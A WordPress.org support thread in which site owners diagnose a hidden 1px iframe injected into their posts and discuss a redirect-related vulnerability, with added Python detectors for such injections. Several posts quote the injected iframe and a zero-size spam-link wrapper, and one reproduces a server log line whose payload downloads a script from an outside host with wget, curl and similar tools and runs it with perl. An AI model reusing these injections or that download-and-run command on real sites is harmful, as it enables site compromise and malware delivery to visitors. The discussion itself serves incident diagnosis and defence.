WordPress.org


iframe injection problem? (92 posts)

  1. lostplay
    Member
    Posted 6 years ago #

    Hi,

    I've searched around for a resolution to my problem but the closest thread I can find is this: http://wordpress.org/support/topic/89912?replies=4

    Basically about a week ago my site began experiencing problems whenever I tried to access the home page http://www.heroes-hype.com. The screen just freezes for about 10 minutes..sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for http://xx.xx.xx.xx./iframe/wp-stats.php

    (the 'x' is an IP address which I don't recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)..I also tried other themes and browsers, but a week later the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    "Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress -- which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either WordPress itself or the theme you're using (which has also been called into question as of late)."

    So now I'm wondering whether anyone can corroborate that this is the likely reason..and whether there is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..or will it?

    Any advice would be much appreciated.

    PS I am using the CSS Freak theme.

  2. whooami
    Member
    Posted 6 years ago #

    what is the xx.xx...

    and you say the problem persists, after removing the stats plugin? I don't see the code on your site.

    Without seeing the xx.xx.xx.xx.. its hard to say much.

  3. whooami
    Member
    Posted 6 years ago #

    http://61.132.75.71/iframe/wp-stats.php

    that? that goes to China, that's prolly not good.

  4. lostplay
    Member
    Posted 6 years ago #

    Hi,

    Yes, that's the IP address..

    Yep, I removed the wp-stats plugin because I originally assumed it was at fault and because I wanted to ensure that I had covered the basics before asking for advice.

    Thanks for the feedback - do you (or anyone else) have any ideas on how to resolve this?

  5. whooami
    Member
    Posted 6 years ago #

    it's not on your single post pages .. have you looked inside your theme files? I would start there with looking at index.php

    Look inside THIS post:

    http://heroes-hype.com/heroes-clues-global-tv-promo

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Step 1: Find where the code is being inserted. From what whooami is saying, it's likely inside the content of one specific post. So look through that post and find and remove it.

    Step 2: Upgrade to the current latest WordPress version (2.2.3). This has no known security issues at this time.

    Step 3: Keep up to date on WordPress releases. On the main dashboard, you'll always see new release information. Also, in WordPress 2.3 and up, WordPress itself will start telling you when your version is out of date and give you info on how to upgrade. So that will be good.

    Given that the code is inside a post's content, then I'd say yeah, they likely did it through the exploit in version 2.2. Upgrade to 2.2.3, right now.

  7. lostplay
    Member
    Posted 6 years ago #

    whooami - you're a star! There was the following iframe inside that post:

    <!-- Traffic Statistics -->
    <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    So does this mean they were attempting to track my stats/traffic? Hmm..very nasty stuff. I have now removed it from that post.

    Otto42 - thank you for your help and advice also! I'm going to do as you advise and upgrade asap.

    Thanks again, I suspect that you have both saved me hours of stress!

  8. whooami
    Member
    Posted 6 years ago #

    So does this mean they were attempting to track my stats/traffic?

    who knows, it would almost be interesting to make up a site that forges a referer that's a wp blog and see if anything can be figured out. I really can't see any way that they can glean anything worthwhile.

  9. lostplay
    Member
    Posted 6 years ago #

    Hmm, it's a strange one indeed. Anyway thanks for the heads-up :)

  10. Toread
    Member
    Posted 6 years ago #

    Happened today on 2.3.1 site. The injected code was:
    <!-- Traffic Statistics -->
    <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    Inside wp-stats.php is JavaScript code. Host 61.132.75.71 is in China. When can we expect a patch?

  11. scchu
    Member
    Posted 6 years ago #

    Yup. The same thing happened to me. Running 2.3. I thought it must've been an exploit for 2.3. But it turns out 2.3.1 is also vulnerable. I am not feeling too comfortable with this actually. And I just noticed it in a post I did 2 days ago!! Now I gotta go back and dig them out... Argh...

  12. daxman
    Member
    Posted 6 years ago #

    Happened to me too.

  13. Chris Roberts
    Member
    Posted 6 years ago #

    Glad to find others discussing this. I've just noticed the same thing turning up in my blog, running v2.3. Was about to update to 2.3.1 but I see from comments on here that it is vulnerable as well.

    Any idea what hole these are crawling through?

  14. Chris Roberts
    Member
    Posted 6 years ago #

  15. Dion Hulse
    WordPress Dev
    Posted 6 years ago #

    Can anyone take a read through their webserver's access logs and look for anything suspect accessing the admin pages?
    Also check for other users, and change the admin passwords.
    It is hard to work out what is happening here without knowing where the problem is coming from.

  16. Lloyd Budd

    Posted 6 years ago #

    Inserting an iframe of that style is the common injection by at least one black hat seo ring -- I've heard of that injection http://xx.xx.xx.xx./iframe/wp-stats.php being on a Joomla! site.

    Columcille, it's still advisable to upgrade to 2.3.1 as it does address security issues. Including what WP theme, plugins, and other s/w is running on your host will help isolate the vector of the exploit.

  17. Chris Roberts
    Member
    Posted 6 years ago #

    Didn't mean to imply that I was going to delay an update. :) I did update to 1.3.1 but from other comments it seems to have the same problem.

    I've just done a little digging in my logs but haven't spotted anything yet. I'll keep looking.

  18. fermuned
    Member
    Posted 6 years ago #

    I suffered the same iframe injection using WP 2.2.2

    The iframe code was inserted inside the last post (I think that could be important) and, looking at the server logs, nobody accessed the admin part of WP nor the single page of the affected post.

    The strangest lines of the server logs are:
    1.-GET //wp-pass.php?_wp_http_referer=http://201.37.71.117:8090/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    2.-"OPTIONS / HTTP/1.1" 200 27903 "-" "Microsoft Data Access Internet Publishing Provider Cache Manager"

  19. aNieto2k
    Member
    Posted 6 years ago #

    I tried to use this code to inject something into posts, but I can't.

    I found a not-good feature in the redirect: is it possible to redirect to another website?

    http://youtblog.com?_wp_http_referer=http://www.google.com

    Why??

    I modified wp_sanitize_redirect() to make the redirection more restrictive.

    function wp_sanitize_redirect($location) {
    	$location = preg_replace('|[^a-z0-9-~+_.?#=&;,/:%]|i', '', $location);
    	$location = wp_kses_no_null($location);

    	/* Only redirections into the blog: an absolute (or protocol-relative)
    	   URL that does not start with the blog's own home URL is replaced by
    	   the home URL. The home URL is quoted so it is compared literally and
    	   must be followed by '/', '?', '#' or the end of the string, so that
    	   http://home.example.evil/ or http://evil/?x=http://home do not pass. */
    	$home = rtrim(get_option("home"), '/');
    	if (preg_match('~^([a-z][a-z0-9+.-]*:)?//~i', $location)
    	    && !preg_match('~^' . preg_quote($home, '~') . '(?:[/?#]|$)~i', $location)) {
    		return $home;
    	}

    	// remove %0d and %0a from location
    	$strip = array('%0d', '%0a');
    	$found = true;
    	while ($found) {
    		$found = false;
    		foreach ($strip as $val) {
    			while (strpos($location, $val) !== false) {
    				$found = true;
    				$location = str_replace($val, '', $location);
    			}
    		}
    	}
    	return $location;
    }

    Sorry for my English.
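As an added example (not code from this thread or from WordPress itself), the Python below does the two checks the last two posts are about: the same-origin redirect test that the modified wp_sanitize_redirect() aims for, and a scan of access-log lines like the one fermuned pasted for a _wp_http_referer value that points off-site. The blog address and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed blog address (assumption, not a site from this thread).
HOME = "http://blog.example.com"

# Apache "combined" log line: client, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def is_local_redirect(home, location):
    """True only if `location` stays on the blog's own scheme and host.

    A substring test (is `home` somewhere inside `location`?) would accept
    http://evil.example/?x=http://blog.example.com, so the host is compared
    after parsing rather than searched for as text."""
    loc = urlsplit(location)
    if not loc.scheme and not loc.netloc:
        return True  # relative path such as /wp-admin/: stays on the blog
    h = urlsplit(home)
    return (loc.scheme.lower(), loc.netloc.lower()) == (h.scheme.lower(), h.netloc.lower())

def offsite_referer_requests(log_lines, home):
    """Return (client_ip, method, status, target) for every request whose
    _wp_http_referer parameter points away from the blog."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        query = parse_qs(target.partition("?")[2], keep_blank_values=True)
        for ref in query.get("_wp_http_referer", []):
            if not is_local_redirect(home, ref):
                hits.append((ip, method, int(status), ref))
    return hits

# Constructed sample lines (203.0.113.0/24 and 192.0.2.0/24 are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Dec/2007:10:15:01 +0000] "GET /wp-pass.php?_wp_http_referer=http://192.0.2.10:8090/tool.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '203.0.113.8 - - [06/Dec/2007:10:16:30 +0000] "GET /wp-pass.php?_wp_http_referer=/2007/12/06/some-post/ HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Dec/2007:10:17:02 +0000] "GET /?p=12 HTTP/1.1" 200 27903 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in offsite_referer_requests(SAMPLE_LOG, HOME):
        print("off-site redirect target from %s: %s %s -> %s" % hit)
```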

  20. pishmishy
    Member
    Posted 6 years ago #

    If you've been affected by this issue it would be very helpful if you can search through any MySQL logs you have to see if we can pin down where the code was inserted into the database.

    See http://trac.wordpress.org/ticket/5313

  21. Mdkart
    Member
    Posted 6 years ago #

    Same problem! Major security issue!

  22. pishmishy
    Member
    Posted 6 years ago #

    Mdkart, do you have any logs that may be useful to us?

  23. voiceofbragg
    Member
    Posted 6 years ago #

    I think my site got one also, if you see some funky stuff

  24. pishmishy
    Member
    Posted 6 years ago #

    voiceofbragg, do you have logs from MySQL that may help us here?

  25. moshu
    Member
    Posted 6 years ago #

    Nope, he's just spamming the forum... [links from his post were deleted]

  26. Mdkart
    Member
    Posted 6 years ago #

    > pishmishy
    No mysql logs, I can't access them on my server :(

  27. laslo
    Member
    Posted 6 years ago #

    I just found some code injected in a post from Dec. 6th
    http://sintonizando.com/2007/12/06/ulrich-schnauss-elika-y-project-skyward-en-vivo-en-lima/

    some spam links hidden by this:

    <font style="position: absolute;overflow: hidden;height: 0;width: 0">

    I'm on WP 2.2
    Any ideas what to fix, or what to update?

  28. theapparatus
    Member
    Posted 6 years ago #

    Any ideas what to fix, or what to update?

    I'd just update the install as you're a few versions behind. It's up to 2.3.1 now.

  29. cbdilger
    Member
    Posted 6 years ago #

    I just found a post with this code injected with WP 2.2.3. I'm upgrading to 2.3.1 now and have contacted my ISP to see if MySQL logs are available. (Edit: no, logs aren't available; darned shared hosting.)

    Plugins:
    Edit Comments 0.3 beta
    Filosofo Comments Preview 0.7
    Spam Karma 2 2.2 r3

    Theme:
    extensively hacked version of kubrick

  30. Urosino
    Member
    Posted 6 years ago #

    Damn, I am having same problem. Just realized this in my source code:

    <!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

    Any solution yet!?
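The two hiding patterns reported in this thread, the 1x1 iframe between "Traffic Statistics" comments and the zero-size font element wrapped around spam links, can be found in stored post content with a small scanner. This is an added example, not code from the thread or from WordPress; the sample post and the .invalid hostnames are constructed.

```python
import re
from html.parser import HTMLParser

# Inline-style fragments that collapse an element to nothing, as in the
# <font style="...height: 0;width: 0"> wrapper quoted above.
ZERO_SIZE = re.compile(r"\b(?:height|width)\s*:\s*0(?:px)?\b", re.I)

def _tiny(value):
    """True for a width/height attribute of 1px or less (e.g. '1', '0px')."""
    digits = value.strip().lower().rstrip("px")
    return digits.isdigit() and int(digits) <= 1

class HiddenContentFinder(HTMLParser):
    """Collects (kind, detail) pairs for content a reader would never see."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name.lower(): (value or "") for name, value in attrs}
        if tag == "iframe" and _tiny(a.get("width", "")) and _tiny(a.get("height", "")):
            self.findings.append(("tiny-iframe", a.get("src", "")))
        style = a.get("style", "")
        if "hidden" in style.lower() and len(ZERO_SIZE.findall(style)) >= 2:
            self.findings.append(("zero-size-" + tag, style))

    def handle_comment(self, data):
        # The injected block in this thread is wrapped in these marker comments.
        if "traffic statistics" in data.lower():
            self.findings.append(("marker-comment", data.strip()))

def find_hidden_injections(post_html):
    parser = HiddenContentFinder()
    parser.feed(post_html)
    parser.close()
    return parser.findings

# Constructed sample post body; .invalid hostnames never resolve.
SAMPLE_POST = """<p>Regular post text with a normal video embed below.</p>
<iframe src="http://video.invalid/embed" width="560" height="315"></iframe>
<!-- Traffic Statistics -->
<iframe src=http://stats.invalid/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->
<font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://spam.invalid/">x</a></font>
"""

if __name__ == "__main__":
    for kind, detail in find_hidden_injections(SAMPLE_POST):
        print(kind, detail)
```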


Topic Closed

This topic has been closed to new replies.
